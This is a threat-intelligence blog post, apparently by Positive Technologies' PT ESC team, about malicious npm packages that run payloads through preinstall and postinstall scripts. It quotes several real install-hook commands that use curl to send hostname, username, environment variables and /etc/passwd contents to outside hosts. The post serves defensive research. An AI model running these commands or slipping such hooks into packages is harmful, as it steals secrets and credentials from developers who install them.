Node JS. Malicious activity at the installation stage

More in General
- Operation Chewbacca
At the end of June, the PT ESC team, during incident investigations, discovered a new group…
- Ding, ding — who's there?
Ding, ding — who's there? 🔔 The cyber intelligence group of Positive Technologies' expert security center…
- Enterprise-grade validation system with schema support
Enterprise-grade validation system with schema support (c) The author of a dozen trojans who forgot to…
- One less feathered thief — plus one hundred rating points!
One less feathered thief — plus one hundred rating points! 😵 The Threat Intelligence team at…
- DragonDoll: a matryoshka in the world of Android spies
DragonDoll: a matryoshka in the world of Android spies 🪆 At the beginning of this spring,…
As part of researching the actions of attackers in npm (Node Package Manager, the main repository of JS code), we decided to take a peek into this area.
JavaScript packages have a mechanism for running scripts at the installation stage. It is described in the
package.json configuration file in the scripts section:{
"name": "<from-ptescalator-with-love>",
"version": "1.0.0",
"description": "Example config of package.json for demonstration-purposes",
"main": "hello.js",
"scripts": {
"preinstall": "echo \"I will be run at pre-install stage\"",
"install": "echo \"I will be run at install stage\"",
"postinstall": "echo \"I will be run at post-install stage\""
}
}
Code language: JSON / JSON with Comments (json)The values are commands for the system interpreter, whether it be sh, bash, fish, or even Windows cmd — whichever is set by default will be used 😎
Attackers take two paths when exploiting the ability to run their payload during installation:
🫥 Run js code
atlas-websocket@33.9.9, postinstall:node index.js
Code language: plaintext (plaintext)wokes@1.0.0, postinstall:node cli/setup-security.js
Code language: plaintext (plaintext)🫥 Execute a command via the system interpreter:
autogestion-aprendizaje@1.0.4, preinstall, passing hostname:echo "No tests" && curl "http://[REDACTED].net/?NPM=$(hostname)&<template>"
Code language: Bash (bash)bsee-shared-hmd@1.0.6, preinstall, stealing /etc/passwd and obtaining hostname:sh -c 'curl -X POST -d "user=$(whoami)&host=$(hostname)&passwd=$(cat /etc/passwd | base64)" https://webhook-test.com/[REDACTED]'
Code language: plaintext (plaintext)
storyblok-rich-text-astro-renderer-workspace@99.99.99, postinstall, stealing environment variables:curl -X POST https://[REDACTED].oastify.com --data "$(env)"
Code language: Bash (bash)
arkoselabs@99.9.13, preinstall, stealing environment variables, /etc/passwd, hostname, and username:curl --data-urlencode "info=$(hostname && whoami && cat /proc/self/environ && cat /etc/passwd)" http://[REDACTED].oast.me"
Code language: Bash (bash)#ti #scs #pyanalysis
@ptescalator
More in General
- Operation Chewbacca
At the end of June, the PT ESC team, during incident investigations, discovered a new group…
- Ding, ding — who's there?
Ding, ding — who's there? 🔔 The cyber intelligence group of Positive Technologies' expert security center…
- Enterprise-grade validation system with schema support
Enterprise-grade validation system with schema support (c) The author of a dozen trojans who forgot to…
- One less feathered thief — plus one hundred rating points!
One less feathered thief — plus one hundred rating points! 😵 The Threat Intelligence team at…
- DragonDoll: a matryoshka in the world of Android spies
DragonDoll: a matryoshka in the world of Android spies 🪆 At the beginning of this spring,…



